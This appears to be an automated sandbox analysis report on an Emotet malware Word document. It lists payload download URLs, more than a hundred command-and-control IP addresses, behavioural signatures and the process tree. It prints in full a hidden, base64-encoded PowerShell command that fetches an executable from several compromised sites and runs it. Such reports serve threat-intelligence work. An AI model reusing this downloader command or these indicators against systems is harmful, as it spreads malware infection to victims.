Analysis
-
max time kernel
139s -
resource
win10v191014 -
submitted
17-12-2019 13:56
Task
task1
Sample
Docs_fbff465d66a0eb834b052719a27f5ab1.5.doc
Resource
win7v191014
General
Malware Config
Extracted
http://nangngucsiam.com/wp-content/plugins/wp-ffpc/4ij33/
http://jsd-id.com/wp-content/uploads/4ae3ep99933/
http://18teens.xyz/wp-content/epewe862/
http://www.fundzit.com/wp-admin/g05/
http://wp.banyannaples.com/cgi-bin/97sq9667/
Extracted
emotet
152.170.108.99:443
99.252.27.6:80
93.148.252.90:80
96.126.121.64:443
104.236.137.72:8080
85.234.143.94:8080
80.85.87.122:8080
2.139.158.136:443
80.11.158.65:8080
79.31.85.103:80
77.55.211.77:8080
96.61.113.203:80
181.198.203.45:443
142.93.114.137:8080
186.15.83.52:8080
181.36.42.205:443
68.183.190.199:8080
159.203.204.126:8080
50.28.51.143:8080
46.101.212.195:8080
188.216.24.204:80
118.36.70.245:80
185.160.212.3:80
190.146.131.105:8080
37.120.185.153:443
91.205.215.57:7080
76.221.133.146:80
139.5.237.27:443
83.165.163.225:80
73.60.8.210:80
93.67.154.252:443
96.38.234.10:80
24.100.130.206:80
109.169.86.13:8080
186.68.48.204:443
82.36.103.14:80
139.162.118.88:8080
200.119.11.118:443
223.255.148.134:80
2.44.167.52:80
91.83.93.124:7080
207.154.204.40:8080
51.255.165.160:8080
97.81.12.153:80
69.163.33.84:8080
68.174.15.223:80
190.186.164.23:80
82.196.15.205:8080
63.246.252.234:80
200.123.101.90:80
138.68.106.4:7080
188.14.39.65:443
119.59.124.163:8080
181.231.62.54:80
217.199.160.224:8080
163.172.40.218:7080
149.62.173.247:8080
203.130.0.69:80
212.71.237.140:8080
46.28.111.142:7080
191.103.76.34:443
204.63.252.182:443
85.152.208.146:80
91.74.175.46:80
91.204.163.19:8090
68.129.203.162:443
91.117.83.59:80
149.135.123.65:80
113.61.76.239:80
200.58.83.179:80
118.200.218.193:443
130.45.45.31:80
190.38.14.52:80
87.106.77.40:7080
142.127.57.63:8080
45.79.95.107:443
183.99.239.141:80
5.32.41.106:80
201.213.32.59:80
62.75.160.178:8080
5.196.35.138:7080
172.90.70.168:8080
192.241.146.84:8080
37.183.121.32:80
86.42.166.147:80
184.184.202.167:443
94.200.114.162:80
190.97.30.167:990
219.75.66.103:80
190.210.184.138:995
181.61.143.177:80
181.135.153.203:443
111.125.71.22:8080
45.50.177.164:80
185.86.148.222:8080
125.99.61.162:7080
116.48.148.32:80
71.76.45.83:443
68.183.170.114:8080
14.160.93.230:80
72.29.55.174:80
62.75.143.100:7080
104.131.58.132:8080
190.195.129.227:8090
2.42.173.240:80
79.7.114.1:80
58.171.181.213:80
178.79.163.131:8080
109.166.89.91:80
203.25.159.3:8080
116.48.138.115:80
200.124.225.32:80
74.59.187.94:80
112.218.134.227:80
82.8.232.51:80
5.88.27.67:8080
144.139.56.105:80
104.33.129.244:80
73.167.135.180:80
87.106.46.107:8080
212.237.50.61:8080
Signatures
-
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 4696 wrote to memory of 2924 4696 Powershell.exe 82 PID 2924 wrote to memory of 3504 2924 67.exe 86 PID 4708 wrote to memory of 432 4708 wrapappid.exe 88 -
Suspicious behavior: EmotetMutantsSpam 2 IoCs
pid Process 3504 67.exe 432 wrapappid.exe -
Drops file in System32 directory 6 IoCs
description ioc Process File renamed C:\Users\Admin\67.exe => C:\Windows\SysWOW64\wrapappid.exe 67.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat wrapappid.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 wrapappid.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE wrapappid.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies wrapappid.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 wrapappid.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 4924 WINWORD.EXE 2924 67.exe 3504 67.exe 4708 wrapappid.exe 432 wrapappid.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4924 WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4696 Powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4696 Powershell.exe 432 wrapappid.exe -
Executes dropped EXE 4 IoCs
pid Process 2924 67.exe 3504 67.exe 4708 wrapappid.exe 432 wrapappid.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4924 WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_fbff465d66a0eb834b052719a27f5ab1.5.doc" /o ""1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of FindShellTrayWindow
- Suspicious behavior: AddClipboardFormatListener
PID:4924
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABSAHoAeQBuAGgAcQBnAHcAdAB5AD0AJwBVAHcAZABkAGEAbgBxAG4AaQByAGgAdQAnADsAJABJAHoAdwBzAHIAawBzAGcAdgBkAGMAZwAgAD0AIAAnADYANwAnADsAJABPAGkAZwBiAGcAegB1AGwAPQAnAEQAdwBtAG0AbQBmAHkAegB6AHEAdgBkAHMAJwA7ACQAVQBlAGsAZABuAG4AZABjAGgAdwByAGUAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEkAegB3AHMAcgBrAHMAZwB2AGQAYwBnACsAJwAuAGUAeABlACcAOwAkAFAAYQBhAHoAcgBlAGwAcwBwAHMAbgA9ACcATQB0AHoAbAB2AGYAdwByAGQAYgB2AGwAagAnADsAJABaAHkAagBzAHEAdgB2AHUAYQB2AHoAaQBlAD0ALgAoACcAbgBlAHcALQBvACcAKwAnAGIAagAnACsAJwBlAGMAdAAnACkAIABOAEUAVAAuAHcARQBCAEMATABJAEUAbgBUADsAJABJAGsAYgBhAGUAYwBnAGcAeQA9ACcAaAB0AHQAcAA6AC8ALwBuAGEAbgBnAG4AZwB1AGMAcwBpAGEAbQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHAAbAB1AGcAaQBuAHMALwB3AHAALQBmAGYAcABjAC8ANABpAGoAMwAzAC8AKgBoAHQAdABwADoALwAvAGoAcwBkAC0AaQBkAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdQBwAGwAbwBhAGQAcwAvADQAYQBlADMAZQBwADkAOQA5ADMAMwAvACoAaAB0AHQAcAA6AC8ALwAxADgAdABlAGUAbgBzAC4AeAB5AHoALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AZQBwAGUAdwBlADgANgAyAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AZgB1AG4AZAB6AGkAdAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AZwAwADUALwAqAGgAdAB0AHAAOgAvAC8AdwBwAC4AYgBhAG4AeQBhAG4AbgBhAHAAbABlAHMALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwA5ADcAcwBxADkANgA2ADcALwAnAC4AIgBTAFAAYABsAGkAVAAiACgAJwAqACcAKQA7ACQAWgBmAGsAcQBkAG4AcgB5AD0AJwBRAHUAcwBlAHgAdQB5AHMAYQBtACcAOwBmAG8AcgBlAGEAYwBoACgAJABaAHIAcwB0AGcAcQByAGUAbQB0ACAAaQBuACAAJABJAGsAYgBhAGUAYwBnAGcAeQApAHsAdAByAHkAewAkAFoAeQBqAHMAcQB2AHYAdQBhAHYAegBpAGUALgAiAEQATwB3AG4AbABgAE8AYABBAEQARgBpAEwAZQAiACgAJABaAHIAcwB0AGcAcQByAGUAbQB0ACwAIAAkAFUAZQBrAGQAbgBuAGQAYwBoAHcAcgBlACkAOwAkAEsAaABtAGcAdwBsAHoAZQBuAGkAagA9ACcASgBoAHgAagBrAHYAdgBmAHoAZgBsAGUAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAdABlACcAKwAnAG0AJwApACAAJABVAGUAawBkAG4AbgBkAGMAaAB3AHIAZQApAC4AIgBsAGUAYABOAEcAVABIACIAIAAtAGcAZQAgADMAMAAwADAAMgApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAHQAYQBgAFIAVAAiACgAJABVAGUAawBkAG4AbgBkAGMAaAB3AHIAZQApADsAJABYAHQAaQBpAHcAagB2AGQAZQA9ACcARgB5AHAAeQBoAGwAagBtAG4AbQBiACcAOwBiAHIAZQBhAGsAOwAkAFEAawBrAGwAYwBhAGIAagBmAHMAaAA9ACcAQQBtAGkAbwBlAHQAbAB1AHEAdwBxAGIAeAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABBAHMAdQB2AGoAcwByAGwAeQBqAGEAZAA9ACcAQQBnAGgAZABpAGsAdwBkAHoAJwA=1⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:4696 -
C:\Users\Admin\67.exe"C:\Users\Admin\67.exe"2⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
PID:2924 -
C:\Users\Admin\67.exe--4e61eeeb3⤵
- Suspicious behavior: EmotetMutantsSpam
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
PID:3504
-
-
-
C:\Windows\SysWOW64\wrapappid.exe"C:\Windows\SysWOW64\wrapappid.exe"1⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
PID:4708 -
C:\Windows\SysWOW64\wrapappid.exe--b3536d482⤵
- Suspicious behavior: EmotetMutantsSpam
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EnumeratesProcesses
- Executes dropped EXE
PID:432
-